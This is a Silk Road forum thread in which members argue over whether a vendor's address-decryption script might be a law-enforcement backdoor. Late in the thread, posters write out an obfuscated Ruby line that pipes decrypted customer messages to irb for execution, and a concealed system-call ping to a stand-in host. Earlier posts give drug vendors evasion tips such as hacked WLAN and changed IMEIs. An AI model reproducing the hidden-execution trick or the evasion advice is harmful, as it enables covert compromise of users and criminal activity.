The LE accusation only holds true if the code can somehow report on users, which it doesn't.
We really have no way to know that without the code being placed on this forum. Your attitude is from the get-go that we should take your word for it.
And your attitude from the get-go has been completely paranoid, accusatory and frankly offensive. I'm also now convinced that even if and/or when the code is posted to the forums (which frankly I wouldn't trust for a real security audit, with one or two very rare exceptions) that you'd still come up with some reason to stick to your attack.
Yes, you're correct.
My attitude is paranoid because you have to be to survive here. I am accusing you of very suspect LE-like behaviour and it's completely irrelevant to the discussion whether me accusing you of being a LE agent hurts your feelings.
If the drug war ends, and it turns out that you were not a LE agent after all, but a python programmer with a lack of introspection who intended to do the right thing, then I will personally give you five hundred US dollars to recompense you for lost custom and aggravation, along of course with a sincere apology. Unfortunately this is unlikely for reasons beyond our control. Today's situation is that you look extremely guilty to me.
Of course it wouldn't make a jot of difference if you posted code to the forums. We *have no* way to know it was the code or a version with the exploit edited out of it.
Not rocket science!
The thread is not about pine trying to get free software out of some open source fanatical resolve, it is about the very great difficulty of trusting somebody who has acted in a very suspicious way.
It can quite easily run on a completely disconnected system. It makes no difference to the program.
Like I said to Sands, this is basically impossible because it's impractical for vendors without appropriate utilization of an Air Gap.
Then they should employ one. Seriously, some old cheap PC with no USB and all the ethernet ports ripped out running a bare minimum install. Data transferred to it via read-only media and no data EVER transferred off it and it's done. How much would it cost using hardware from 6 or 7 years ago? Fifty bucks? A hundred?
If as a result of this thread every vendor went and got an Air Gap, I would be flabbergasted. Delighted, but in some kind of shock.
Every time a vendor has to make a reply to a customer, they have to burn data to 2 read only DVD/CDs. Once to find out what the message was, once to make the reply.
While it is obviously the case a vendor could make 'batch replies' or 'batch reads' if not replying, you are trivializing what is a serious amount of work and more importantly the delay in responding to customers. You're also missing the fact that a great many vendors are transient vendors, not permanent fixtures to the marketplace, in fact the majority of them are probably temp vendors rather than in it for the long haul.
-
Pine, this is the second time you've accused me of being LE based on a misunderstanding of software. The first time was not understanding how GPG verifies signatures. You were able to verify that my explanation matched GPG's documentation independently and I have no doubt that in time the independent verification will prove me right here.
I did not accuse you of being a LE agent before. I merely stated I had to validate your claims that GPG worked the way you said it did. That was possible in that instance.
Actually you did:
bash-3.2$ ls -l pine-leo1.eml.asc
-rw-r--r-- 1 user staff 1951 Sep 6 07:37 pine-leo1.eml.asc
bash-3.2$ gpg -v pine-leo1.eml.asc
gpg: armor header: Version: GnuPG v2.0.17 (MingW32)
gpg: public key is 0x00ACF6D2D677EF45
gpg: using subkey 0x00ACF6D2D677EF45 instead of primary key 0x7E8BE6B1DD7B4576
You need a passphrase to unlock the secret key for
user: "Louis Cyphre <lcyphre@tormail.org>"
gpg: using subkey 0x00ACF6D2D677EF45 instead of primary key 0x7E8BE6B1DD7B4576
4096-bit ELG-E key, ID 0x00ACF6D2D677EF45, created 2012-06-16
(subkey on main key ID 0x7E8BE6B1DD7B4576)
gpg: encrypted with 4096-bit ELG-E key, ID 0x00ACF6D2D677EF45, created 2012-06-16
"Louis Cyphre <lcyphre@tormail.org>"
gpg: AES256 encrypted data
gpg: original file name=''
bash-3.2$ cat pine-leo1.eml
Hi LC!
Your signed PGP message is invalid! :O
I've tested it with other people's PGP sigs, and the software is working ok.
KeyID: DD7B4576
Status: Key NOT valid
User Name: Louis Cyphre <lcyphre@tormail.org>
So, either signed it wrong or you're LE attempting a threesome :D
Cheers!
Pine
bash-3.2$
So, I re-iterate, this is your second false accusation against me. Unless you're going to deny that you sent me that and to which I responded by explaining how key validity and the web of trust works.
Do you want to also post the rest of our communication surrounding that exchange? Because you missed the bit where I explain I have to go double check this thing. You'd think the smiley face emoticon would indicate an element of humor regarding my so called "accusation".
I do find it interesting you're storing decrypted messages though.
In this instance, it is impossible for me, or anybody else, to validate your claims about this software. That is the single most important fact, and no amount of Cyphere Software Apologists are going to make that go away.
Yet there are ways for anyone who buys it to do so. Not to mention the fact that if it were to fail such an audit they could get my account suspended by SR.
What? So it costs 150 dollars and an LE agent becoming a member of the community per exploitation delivery? I think a LEA would be quite happy with that kind of return on investment to be honest. Don't talk as if you've a lot to lose if my suspicions are correct. You don't.
And explaining those away still doesn't achieve the main objective you should have had from the onset. There is basically no way to "decriminate" yourself in fact.
Which proves the point I made above, you've made up your mind and there's nothing I can do to change that. As I said, even if I were to post all the code now you'd still think I was up to something.
What I have made my mind up about, is that your actions are incredibly suspect and lead me to believe you could be a LE agent. Of course this cannot ever be proven on an anonymous forum. And as I said before, that posting the code is irrelevant is merely a statement of the obvious.
Your statements here are a logical fallacy, what in debating is called "Tu Quoque". In English, you think that by answering a criticism with a criticism, that you are engaging me, when in fact you're avoiding the main point which is that we can't trust people who have sketchy behavior.
If your response was along the lines of "I am not a LE agent, but I can see that this looks a bit suspect to you because if I were hypothetically LE I could be trying to deliver an exploit, in future I will do X {checksum/ do proper independent audits, make it publicly available} so that the software could be validated against containing exploits" then I would be still mad that you didn't think of the necessity of software auditing on a forum of criminals, but nowhere near as mad as I am now, because your position is essentially this, when you take out the verbiage:
"Hi, I'm LouisCyphre, you all know me so you already know I'm ok, my software is totally legit because I could have hypothetically done one of the things I mentioned above (but didn't) but don't worry because if you get arrested because it contained an exploit you can always tell DPR to suspend my account, LOL free market FTW, eh?!"
--
disclaimer: we use prepaid international SIM , change IMEI numbers, throw away phones and hacked WLAN for access to the site.
This scripts will only be used in torbox images.
See, if every vendor had operational security up to this level of sophistication it'd be fine in practice, but it's not something you can assume for everybody.
Idea for verification->
Let 5 "trusted" members verify the source and publish the MD5 hash.
Do that with every version.
Donate to the members and cyphre. DONATE ENOUGH FOR THEM!
Give away scripts for free.Work together for the good of the community. Public development thread.
A MD5 hash isn't good enough nowadays, but the main point of this I agree with. If there an entire "open open source" development of short useful scripts available on the forum with some arrangement where 'bitcoin bountys'
existed for getting good stuff, then that would be great. I can't organize all this, but maybe somebody
else could take up the torch. I would recommend that all scripts were javascript since it doesn't have networking/
local HD access at all and is straight forward to audit as long as the scripts are small enough.
--
Not quite. The really low hanging fruit is the vendors using Windows systems and I haven't ported it to Windows yet. I'm certainly not inclined to right now.
This is pretty much the only argument you've made I agree with thus far.
-
There have been a lot of unfounded accusations thrown around these forums lately by quite a large number of people; many of these accusations are based on pure conjecture, and that is also the case here as there is no evidence to suggest or back up your claims that LouisCyphre is LE.
If you purchase the code and it does have malicious intent, you can stand behind your claim with proof.
Whilst it is of course possible that the copy you receive may be different than everybody else's, it is terribly foolish to make claims based on pure conjecture, especially claims as serious as this.
- grahamgreene
Graham, we are not playing by the same rules as regular civil society. We are criminals and we cannot afford to be playing by 'Marquis of Queensbury' rules or we will hang.
It is literally not possible to prove anything concrete on a forum of anonymous participants, since all you have is information from them. That does not mean you cannot red flag suspect behavior when it occurs.
Like I said already, if I am wrong, there is no real downside apart from Louis feeling aggrieved. The other option is that perhaps tens, hundreds, who really knows what number if nobody raised any alarm bells and it was popularized, of vendors go to the wall.
I hope that I am completely wrong. I did not post this thread, as some have said/implied, in some kind of angry ranting mood. In fact I thought about this for several hours before posting it. I realized the only thing that really prevented me from posting and calling out Louis outright was that we knew each other though PGP Club. Since this is an illogical rationale, I wrote to DPR expressing my concern and he thought the best thing would be to air these in public.
I know something about computer hacking. I know more than I want to about law enforcement, that is where my certainty that this is a highly suspect, probable LE act comes from. If this is paranoia, is is most assuredly informed paranoia.
This is the equivalent of preventative medicine. Would you want doctors to wait until they are 100% certain it is a cancerous tumor, or do you wish them to cut it out, even if it later turns out to be entirely benign? Or maybe you want to give the strange unknown lump a fair shake. After all, you have not yet proven it is cancerous. This is a direct analogy, because if you are busted on SR, it will be like a disease removing years from your lifespan, they are likely to be heavily disproportionate since they cannot catch us all at once, and will attribute yourself as a 'prime mover', as part of a conspiracy. I mean that in the legal sense of the word. That is if somebody on SR commits a crime, then you are responsible for it. Sounds like something I'm making up I know, but I'm unfortunately not.
So, those are the stakes.
A "middle of the road" perspective, where everybody has a point but nobody is completely wrong is a dangerous one. It makes LE agents into hypothetical creatures, which they most certainly are not. A lack of visibility on this is a key problem on this hidden service, kmfkewm has frequently noted this, it is detrimental to drug consumers, but positively lethal to drug suppliers.
There are two options before you: Louis Cyphre is a LE agent or he is not. Ignore his words after the incident, and examine his actual actions. What do you get?
I have put the probability at 70:30, which I think is more than fair. You can arrive at your own personal conclusions. I do not require other people to agree with me to change that ratio up or down, that would be fundamentally irrational when for all we know half the respondents in the thread could also be LE sockpuppets.
So in short, you don't get to change the title of *my* thread because you don't agree with me. That doesn't make sense. You can however make your own thread on this topic and call it whatever you wish.
-
A general point I neglected to mention which may explain some of this situation:
People must understand that DPR isn't necessarily going to be pointing out every possible pitfall and removing them as options. For example, DPR's approach when I brought up the issue of LouisCyphre's program as a security concern for vendors was not "Yes, let's ban him, LE for sure" or "You're probably paranoid, Pine, I mean you think you're a platypus (but this is true)", it was "Go to the forum and have at it, let the vendors themselves decide what is best". This may seem strange, and it did to me at first blush, but I think the general idea, partly at least, is stemming from market based philosophy, is that being overly protective of a market could eventually lead to its downfall if people weren't recognizing 'issues' for themselves, whether or not they got them right or wrong.
That is interesting since DPR already knew what I was doing before I made the listing. He has not (yet) taken me up on my offer to provide a copy of the code for his own peace of mind.
You're right about the agorist philosophy behind his response too. You were asking him to regulate the market, which is the antithesis of what an agorist market is.
Actually, after informing DPR of my suspicions, I asked for something quite different.
--
It's even simpler than that: If you don't want to use it for whatever reason, don't buy it. If you do, buy it, I'll help you set it up, explain exactly what it does and how, provide best recommendations for secure use and if it turns out I'm fucking with you then you can provide that proof to DPR and he can terminate my account.
That is priceless. So... you're implicitly saying that in the time frame it takes:
A: You to realize this, which you almost certainly won't since that kinda misses the point of a deanonymizing exploit, and
B: The time it takes the police to grab you by the time you realize they are inside the building.
That the vendor will somehow obtain Internet access and dial up SR with a complaint. Because when a criminal is involved in computer based crime, LE agents always give them access to a laptop so he can skype his lawyer or whatever. I mean you're actually right, I cannot believe I did not think of this before.
--
Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.
Except it is insanely more difficult to pwn someone with a malicious JPG than it is to own someone who runs the script they just privately got from you....none of your arguments hold water and honestly they are stretching very far to try to make what you are doing appear to be anything other than sketchy with a capital S.
QFT
--
And no. So long as the scripts themselves are not ridiculous mountains of tortured spaghetti code (in which case no-one should run it on general principle), there will be no room full of NSA spooks required to vet the code thoroughly. It will be relatively brief. Either it makes network connections, or it doesn't. Either it does unexpected IO, or it doesn't.
This is not true at all.
It is not as simple a brief Ctrl-F to search for code that makes network connections or examine I/O, finding exploits can be difficult. Myself and kmfkewm have come up with at least two perfectly plausible methods that are difficult to detect, and it's not as if we've spent months and months working out all the angles to make it come good like a real exploit tiger team would be doing.
-
I want to thank Pine for explaining how exploits are hidden in code in such a way as to not be found, like I was in kindergarden, and typing in my first commands in Basic on a Commadore pet. incredibly presumptuous of you. Nothing like running to the forum and screaming LE! LE! LE! for teh lulz, eh, Pine? ..........sickgirl
You can't talk that way to Pine... She has worked too hard typing her finger raw for this community. A little respect, please.
Ok, first off, I was responding to the condescending way I was being addressed. I for one appreciate all that she has done vis a vis the PGP club, but in this thread she made a lot of baseless accusations, and when I have someone who presumes that I do not know jack about computing, or code, I will correct them. When I am being spoken down to, I will respond in kind. As for "I can't"...well, I did, just as she did. I have been on silk road for over a year, I am not some n00b girl who comes in and runs her mouth. Do a little thread searching. I am actually quite polite, and patient. I do not however, take kindly to fear mongering and baseless accusations. The title of this thread was completely un called for. Therefore, it boils down to this. Communicate to me as if I were your equal, and do not make assumptions, and I will treat you and anyone else with respect. Disrespect me, and most likely, I will still be polite, but I will call you out. As for my sharp tone when I did it? yeah, that was a bit out of character for me, but I was on the border of WD. Now my package has arrived and I am good, but I will not apologise. After all, I did not resort to name calling, nor did I go off and make accusations or assumptions toward her. I have given pine plenty of positive karma, and I really groove at a lot of the posts/threads she has made, and this does not change that. Just because someone does good for the community does not mean that they are a goddess who cannot ever be spoken to in a manner that may be less than praise. Respect is a two way street sweetie
I thank you wizdom for supporting me, yet it is also the case that sickgirl has a point in saying that comments should be judged on a per post basis if possible. As a heuristic, we naturally expect similar things from people i.e.continuity, but there is always the danger of winding up being engaged in what is called arguments to authority, that is not to say Pine is an authority, it's just the name of the fallacy, but that if anybody is right much of the time it doesn't necessarily follow they happen to right this particular time. This happens a lot with scientists in this era unfortunately.
I went back and investigated my reply to your post sickgirl, and I can see how it came across as condescending. I stand behind the actual content of what I was saying, because it makes as much sense as it did to me back when I posted it, but I can assure you it was not meant to imply you were ignorant. Quite honestly it can be hard to tell who knows what, so I can sometimes give the impression of a lecturing tone, but the thing is I have no way to know what level of technological expertise you're at. I am also certain many people in PGP Club know and can skip over many of the steps I give them, but if I didn't deliberately elucidate each and every step, my tutorials would become un-newb-friendly, and accessible only to those already computer literate. I mean, it can be irritating when being told first principals over again, but it's not as big a problem as losing somebody in a conservation by talking over their head, then you make people feel small too, which is especially undesirable. I mean either way you stand to seem arrogant, I don't always achieve the right balance.
-
I was a staunch capitalist for many years Limetless - I was pro-regulation, pro-market manipulation, pro-government and essentially pro-fascist given the nature of the beasts that I supported. With capitalism comes regulation and government intrusion. Indeed capitalism by it's very regulatory nature is what powers the governments of today, and with them, their restrictive laws.
I think you just lost pretty much everybody here. Is this a postmodernist interpretation of capitalism?
-
"Hi, I'm LouisCyphre, you all know me so you already know I'm ok, my software is totally legit because I could have hypothetically done one of the things I mentioned above (but didn't) but don't worry because if you get arrested because it contained an exploit you can always tell DPR to suspend my account, LOL free market FTW, eh?!"
LOOOOOOOL.
-
We shall have to agree to disagree my friend. :)
Anyway to the original point, can anyone confirm that the person is 110% Bent or not because I've had messages from both sides asking me to step in now so conclusions would be nice.
Well you can never prove anybody is 100% anything on an anonymous forum. I have not been requesting that LouisCyphre be banned. I have been saying loud and clear I consider his actions very suspect and that they have the same modus operandi I'd expect from a LE agent, so he is probably exactly that. The title of the thread which so outrages him is not intended to be a half measure.
If you want a number, mine is 70:30, where there's a 7/10 chance Louis is a LE agent, and 3/10 chance Louis is a python programmer that didn't think about what would happen if he gave drug dealers code they almost certainly couldn't audit in practice. I consider this estimate fair. Some people here though are massively more lazare faire about the odds, which I suspect is going to undergo a dramatic reversal when somebody here does actually publicly get busted with some exploit.
--
Frankly, what I see here is that Louis appears to be being held to a higher standard than other vendors here on Silk Road. As almost everyone who knows me on here is aware, I'm not a drug user. Let's put that aside for a moment, and assume that this is not the case -- let's assume for a moment, for the purpose of argument, that I have decided to purchase a quantity of heroin. Now, how do I know that the heroin I purchase from a vendor on here has not been cut with Drano or rat poison? I don't.
Similarly, you don't see weed vendors being asked to submit their wares for testing to prove that they were not sprayed with God only knows what insecticide or fungicide.
I don't see DPR mandating that all drug vendors must have their wares laboratory-tested prior to sale, to prove their purity, and to prove that they were not contaminated/adulterated with harmful chemicals.
That's exactly correct and completely appropriate about a higher standard. Louis is absolutely being held to a higher standard, yes. This is because he knows a lot about computer security. So, it is a much greater suspension of trust I must have when Louis does something that frankly strongly resembles somebody trying to pass on an exploit to a target. Were some other less well known SR member to start posting security programs on SR, I would not be quite so worried about it, although I would express the same concerns.
Louis cannot claim ignorance of security procedures. His reputation as a helpful SR member is also a greater responsibility than most.
If we take away the name LouisCyphre and replaced it with somebody else uploading non audited software for drug vendors to use, then this thread would be startlingly different in character, which is not good, because reputation shouldn't matter if you goof up.
As for DPR mandating various testing schemes, it would indeed be nice if we could do such testing in a uniform manner, but mandating this won't work because it'd produce points of central weakness. We have not reached a solution here yet, there is surely a lot of work to do.
I also haven't seen Pine (or anyone else) pillory the vendors of the various USB-stick-based anonymity solutions that are being hawked on Silk Road.
I just did so in this very thread! Check!
I have also talked about it before now, how it was dumb to obtain hardware/software from SR, but it was something like seven or nine months ago. It bears repeating of course. To be honest with you, in the back of my mind I consider such a thing so completely obvious it hardly crosses my mind it might not be LE plot. I think I've also seen people trying to sell mobile phones here too. There are some things which seem so obviously mental you can't be sure helping those who would have acquired them will do any good before they launch themselves like lemmings into the next available LE ambush.
Besides, you never really get thanked for pointing out people's inadequate security procedures. They tend to take it as a personal affront. The carrot works better than the stick. Then there's emergencies like this situation where the potential danger trumps treading on somebody's toes.
Maybe that seems somewhat cynical, but the question is really not:
"How do I know this USB drive I got off an illegal drug network contains LE malware?"
It's more:
"Why wouldn't it have LE malware on it?"
In other words, on the black market, the burden of proof, due to the penalties for being wrong, switches places. You know this is true as well as I do, a brief thought experiment: just approach your local drug gang, and see how far "you can't prove I'm not a police" gets you. I mean, that's why you have to kill people to become a member of many gangs in the first place, it's a sure way to distinguish between possible police and the genuine article, and there's always a never ending stream of people who require killing, mostly because of their civilian logic that doesn't apply to the black market, we already talked about this in separate thread recently. This is of course, extraordinarily unpleasant for all affected, which is why SR is such a drastic improvement on what went before. The position of the burden of proof is still on you to not act in 'sketchy' ways though, rather than other people. Black markets are worlds of empiricism.
Anybody with other idea, lacks experience. This is what haunts many members of the open vendor database, knowing the implications of being wrong from past experience or from the street and then seeing people on SR committing the same errors, often refusing point blank to recognize them for what they are. It's like when you cringe when a learner driver conflates the brake for the accelerator.
-
Does the trigger string need to be part of the code or does it just tell the existing code to activate?
It needs to be part of the code, I included it as a comment so that it has no effect on the script but still signals to the original script that it should pipe the plaintext to irb.
I'm assuming you mean the former, but I just want to clarify (since I don't know Ruby and don't know what your code snippet actually does).
Well, if pack in Ruby is what I think it is, then to do the same in Python I'd have to import struct (and probably array too). I've already said several times what modules are imported, so there goes that.
pack changes how data is displayed. For example I could unpack the string "see" into binary representation : "see".unpack("B*") == "011100110110010101100101"
and I could put that in an array and pack it back into a string ["011100110110010101100101"].pack("B*") == "see"
so when I say
puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
it is equal to saying
puts `echo "#{decrypted_message}" | irb`
which means that the decrypted message should be piped to irb which is a command line style tool for running ruby scripts.
I could also have said this:
puts `echo "#{decrypted_message}" #{["7c20697262"].pack("H*")}`
Hell, there are only two files with integers in them (to read data in each row of the CSVs). Well, alright, 5 files if you count the one with a number in the name and the two files that invoke it. Obviously in the case of those three files the number is part of a string and not an integer.
These numbers are strings also, anything in " " is a string.
Plus if a vendor is using an air gap all the networking code in the world won't do shit. Yes, I know buyers are lazy and probably don't, but the paranoia of dealing makes an air gap a greater possibility.
And if we wear bomb proof suits we can jump on hand grenades.
-
Then the issue boils down to where is the encrypted data coming from? If there is encrypted data in my code (there isn't) then what you describe is possible. If the only encrypted data is coming from vendor's order page then it's really not.
Doesn't the encrypted data on the vendors page come from customers? The encrypted data is coming from a customer who encrypts ruby code instead of their address. In fact they can even encrypt ruby code that puts their address after it is done with all of its networking.
Ah, that answers one of my other questions.
I'd have to add a lot of code to achieve that with my current effort. There is no way to conceal that something was occurring between the decryption and the parsing of the decrypted data to produce a printable file. Especially not after stating that the bash command was just the GPG command (i.e. gpg --decrypt-files *.asc) and doing it in Python is this:
os.system("gpg --decrypt-files *.asc")
To do that I would need to insert code which checked each decrypted address for a specific string and then generate the code.
No it doesn't need to generate the code. Currently what I showed does check for a specific string and if it finds it it pipes the decrypted message to a ruby interpreter, which then runs it as a completely different script automatically. There are probably even more sneaky ways to do it without looking for a special string.
See, in my code it's a little more modular. There is a file that will run everything, but the instructions indicate the best way to handle it is to run things sequentially. Once the first section is run up to the decryption command, that script stops. Then the vendor checks all the .txt files to see if there's anything he or she needs to edit to fit the template for printing.
Like you, I realised that buyers could put anything they liked in there, but I was considering the probability of little thankyou notes to their favourite vendor(s) which may be nice, but don't help with printing labels or envelopes well.
We can not possibly know what it does without looking at it, that is the entire point of this thread. But honestly if you want to let the market decide I really don't give a shit. I think that you are thinking more with your wallet than logically though.
I'm certainly considering the financial aspect, but I haven't completely disregarded logic. If I had then I wouldn't've been able to handle this thread so consistently.
-
So, again, why is Louis being held to a higher standard than everyone else? Why is he being asked to prove the safety of his product, when every other vendor on Silk Road is not?
If somebody sends poison in the post it effects a few people before it gets caught. If vendors install software with an exploit, then they all get busted. That is why I say we're not playing by Marquis of Queensbury rules.
--
You, sir, are now engaging in the same type of vile and slanderous accusations as Pine. Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile. It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.
Get off your high horse.
This is not a courtroom. This is the black market. You did something incriminating. That is more than enough to justify labeling you a as potential LE agent.
--
As such, Louis has the right to market his wares under any conditions that he deems fit.
Nobody really argued that he should be banned from selling it, we are just warning people that it is dumb if they buy it unless the source code is publicly available for all to audit. The type of people who will buy something like this are inherently people who do not know how to properly audit it.
Not true. Pine tried exactly that before starting this thread. See this post from her details earlier in this thread:
http://dkn255hz262ypmii.onion/index.php?topic=40934.msg451841#msg451841
That doesn't say I tried to ban you at all. That was just your interpretation of why you think I went to DPR. And it is true, I didn't ask DPR to ban you, I had something quite different on my mind.
I asked to setup a dummy buyer so we could obverse what happened in a remote controlled environment, with the intention of following an exploits comms (if it was that kind of exploit) and tracing it back to the destination IP address, which is almost certainly going to be a DEA office.
After some consideration, I agree with DPRs assessment that calling you out in the open about this was more effective on several counts. Not only did it create a discussion interesting in terms of illustrating how exploits can work and spreading some security awareness on that count, but having your RL identity could have turned into more of a problem than a solution. It might achieve proving you are/aren't a LE agent (no IP), but the downside is that if you are a LE agent, then the temptation of coercion would leak in, not now, but if this war went hot suddenly, it'd be a temptation to retaliate directly, simply because it would be easy and satisfying. This is of course defiles the moral objective of this enterprise. Even LE agents shouldn't have to fear this specter, enough people have suffered and bled for this war already. I would hope there exists a 'anti-pine' on the other side that takes the same view. More pragmatically, it would make this war ever more intractable and draw more resources against the darknet markets, the entire thing could spin completely out of control if we suddenly started with such an active approach.
Frankly, what I see here is that Louis appears to be being held to a higher standard than other vendors here on Silk Road.
If a vendor is selling MDMA tablets that are of a press known to frequently contain PMA then is it wrong for us to bring this up? No. He is being held to the same standard as any other vendor, reviews are being left on his product. If someone sells PMA we don't need to try it to leave a review saying that it is dangerous, do we?
Ah, but this isn't really a review of the product, it's your assertions about it with no evidence. You already know how to get the evidence to prove one of us right, you're choosing not to.
Also, your MDMA/PMA analogy still depends on someone purchasing the product and testing it.
As repeatedly explained the problem is that there is no way to know what you "intended" to do vs what you choose to show us later on.
As almost everyone who knows me on here is aware, I'm not a drug user. Let's put that aside for a moment, and assume that this is not the case -- let's assume for a moment, for the purpose of argument, that I have decided to purchase a quantity of heroin. Now, how do I know that the heroin I purchase from a vendor on here has not been cut with Drano or rat poison? I don't.
It is wrong to say that his product IS backdoored. It is wrong to say a vendors product has been cut with Drano if you have not purchased some and tested it. it is not wrong to say that PMA is dangerous if a vendor is selling PMA.
Yet you have previously stated that my code contains an exploit simply because you thought of a way it could be done. You have not actually obtained the code and proven that it does contain such an exploit.
I have written the code and stated there is no such exploit. You have yet to prove that I am lying.
Another major vendor is running the code and has stated that it does exactly what I said it did. You and Pine have been unable to prove that false.
We don't have to prove anything. You don't get it. The burden of proof is on everybody on SR not to act in sketchy ways. If you are not LE, then I certainly know you're new to these markets. The burden of proof has always been on the person the question is being asked of. It is up to you to prove your innocence by not acting in incriminating ways rather than the other way around. On the white market, in civilian courts this is the other way around.
You seem to have the idea that this is supposed to be fair. This is an amazing idea, clearly you are new to criminality.
Once again, these aren't reviews of the product and your claim that they are is disingenuous at best. Your assertions are a series of hypothetical explanations of how an exploit could be inserted, but not a review of the actual code I am selling.
There has been one review of the code in this thread, which you have chosen to ignore.
That review is here (on the first page):
http://dkn255hz262ypmii.onion/index.php?topic=40934.msg450715#msg450715
Louis, you could have 1000 reviews, but they could all be LE buyers collaborating with you to form an illusion of reliability. The only way we can see to prove the code that you are giving us, and the code other people are executing, is the same code, is if it comes from the same place i.e. a forum thread on here. Believe it or not, LE agents lie sometimes, even lying about themselves lying. Incredible, I know! Who would have thought them so unscrupulous!
If I am paranoid and 'accusatory' (probably because I'm actually accusing you, no?) then you've been seriously obtuse by pretending many things are more straight forward than they actually are.
Air gaps. -> They are not simple for most vendors to use.
You want to make extra money. -> But you intend to sell to what is probably literally SR's smallest market.
Computer programming. -> Not everybody is able to follow it, even when explained in detail. Probably because it takes months/years to learn it.
Open source. -> But only non-programmers will be reading the code. I'm sure there's a soviet russia joke in this somewhere.
You guys have to prove I tried to pull off an exploit. -> Except nobody independently generated a checksum since you didn't think to request it in the first place, we have no idea if you're giving the original code. It's not as if one or two people would be enough either, you'd need lots, having auditors signing your program would also work, but both principals are based on the fundamental principal of counting.
--
Well, on a theoretical level I think that everything you said makes sense guru, but on the other hand I feel that your comparison between asking a drug seller to prove their wares and asking a programmer to prove that their software is safe.
The difference is as follows:
1. It's impossible for a drug seller to really prove that they'll always be shipping something safe. It's a lot easier for a programmer to prove that their program is safe by releasing it open source etc.
Two problems here:
1) A programmer could release code that is safe and sell something else.
Holy cow, I think we're getting to you at last!
2) Releasing the code freely cuts out payment for the work put in, as I've explained previously.
If you're not LE, then that sucks, but there is nothing you can do about it, you just have to deal.
2. If a drug dealer ships something unsafe then 1 person has a bad reaction. If louis widely gives out malware specifically targetting vendors and information regarding their vending then thats a major blow to silk road itself.
That's a big if. Pine and Kmf have each asserted it does and I've already stated that anyone can purchase the code and post it to the forum. Until someone does then this is all conjecture and baseless assertions.
This appears to be a problematic concept.
- We are saying that your profile of targeting vendors, esp. large vendors given the price tag, with code they can't read, which was your initial proposition, is very LE-like.
- The above ^, is not evidence you are LE. There is no evidence you are LE as I've already said, it's not actually possible to obtain any. It just strongly implies that you are.
There is no practical difference between "I think he is probably LE" and "This guy is LE". In RL the reception is the same, and it doesn't change here. The title of the thread is about obtaining hits, because a wishywashy 'I think maybe perhaps, sorta, coulda be LE" doesn't quite have the same resonance. I am accusing you of something. This is not equivalent to making a scientifically provable statement. It is called an opinion. You can go create a thread called "Louis is not LE" or something. Same applies.
So sure, don't force louis to do anything, but at the same time I'm glad that people have spoken out against this because this WOULD be a great way to get at vendors(although I don't think that it is that).
For the record, I don't have any problem with questions about what the code does.
What I have a problem with is the baseless and false accusations of nefarious activity on my part with nothing to back it up. You've seen that I've copped that from both Pine and Kmf.
Good grief, call us back when you climb down off the cross Cypher Jesus. You think I give a flying fuck about how affronted you are when there was a fantastic opportunity vendors using your software would have got busted if this had not been made public. Even if you don't think it's a case of 70:30 ratio of Louis being a LE agent, most people in this thread think the opportunity cost of being wrong is too high even if the ratio was 10:90.
For the record on my part, I think this has been a healthy albeit awkward discussion that has made the dangers of software exploits abundantly clear. If this was a LE project, it has failed miserably. If Louis feels offended, well, that's just too bad. If he's around after the drug war and it is shown I was wrong, then I'll be delighted to compensate him.
-
Indeed, I know a vendor who spends half a day decrypting addresses.
Sroppy does it in milliseconds.
Vendor doesnt have to do crazy gangsigns on his laptop keyboard anymore cutting and pasting blocks of pgp gibberish
I wonder if the vendor has heard of the wildcard.
-
By the end of next year Ruby will be 18 years old, nearly old enough to drink (in most places) and it still doesn't have that. Wow.
Ruby does bytecode but in most implementations of it there is not a (easy , or intended) way to launch programs directly from bytecode. Also I think Ruby is 20 years old not 18.
As far as how many people here know C and can audit it, I assume quite a few actually. I have had no problems finding a whole lot of people to look over any of the code I have ever written. We are on a forum on the darknet where everyone uses crypto, there are probably hundreds to a thousand professional and hobbyist programmers on this forum.
-
Every time a vendor has to make a reply to a customer, they have to burn data to 2 read only DVD/CDs. Once to find out what the message was, once to make the reply.
Actually at least in one direction they would need to hand type the information over. Using DVD's in both directions would break the air gap.
-
having the Road on one machine then printing on another machine really doesn't seem too bad.
i mean.. as long as you have a basic grasp on the idea of reading and typing what you have read.
>.> air gap, smair gap.
someone on here is a fucking cop, boys! and we're gonna sherlock holmes this shit until the end!!!11111oneoneoneone
/thumbs
-
inserting a function that checks decrypted addresses for such code to run AND is used in conjunction with an order containing that code AND is being run on a system with network access.
It doesn't need to check for code, it can check for anything. It can run messages that are 101 bytes as ruby code and puts all the others. And actually it doesn't even need that because you can directly issue commands to the terminal with Ruby at least and I would highly bet that you can with python.
Yep, I've demonstrated this a couple of times already. It's a function, though, Python doesn't have anything like Ruby's put command (no, I haven't learned the language, I just looked at the Wikipedia page on it).
having `ping t.cc` in a script will ping t.cc, just need to encode it in some funky way to try to hide that it is happening. Now there is no need to load networking modules at all or to run any decrypted messages as code.
Okay, but calling the function necessary to invoke it is rather obvious. Locating that is just a matter of grepping for os.system.
Now I could conceal that a little with something like:
import os
s = os.system
But then it would still be clear that s("ping supersecretlebase.example.com") is a system call.
* No encrypted data is shipped with my code.
But it gets encrypted data input from random customers
Yeah, when I wrote that I didn't get what your code was actually doing.
* There is a copy of my GPG key currently. I think I will remove it in light of this and just include the details for obtaining it (it's here, on the vendor pages and on the key servers).
There is no reason for there to be a copy of your GPG key, in the example I gave the exploit is encrypted to the vendors key and they load it into the program, they have no ability to tell encrypted ruby code apart from encrypted addresses because ciphertext looks random in either case.
I've removed the key from the current dev branch for two reasons: to remove the possibility of hiding something in there and in case a user runs everything from the extracted directory instead of copying the specified files to a temp directory.
* There is no such exploit in my code.
Possibly not. Probably not even!
Well, Pine has finally returned to the thread and she doesn't share your confidence in the probabilities.
But nobody really knows unless we can look at it. That is the entire point of this thread. We should not have a culture here where peoples claims are taken at face value, especially when vendors are at risk. The purpose of my posting code was simply to show that even a tiny bit of code can make the difference between a secure program and a backdoored one. Honestly I was surprised at how well the backdoor was hidden, certainly better than in my first attempt where I simply unpacked all the calls to arrays of numbers. I have never tried hiding backdoors in code before, and if I tried harder I could probably even make it more subtle than the last example I gave.
Well, you're one ahead of me. I don't have any experience planting backdoors in code.
* Such an exploit would be able to be spotted.
Indeed by anyone who know the language well enough to
A. Know what back ticks do
B. Know what pack and unpack do
C. Know what | does on a terminal
D. Know what irb is
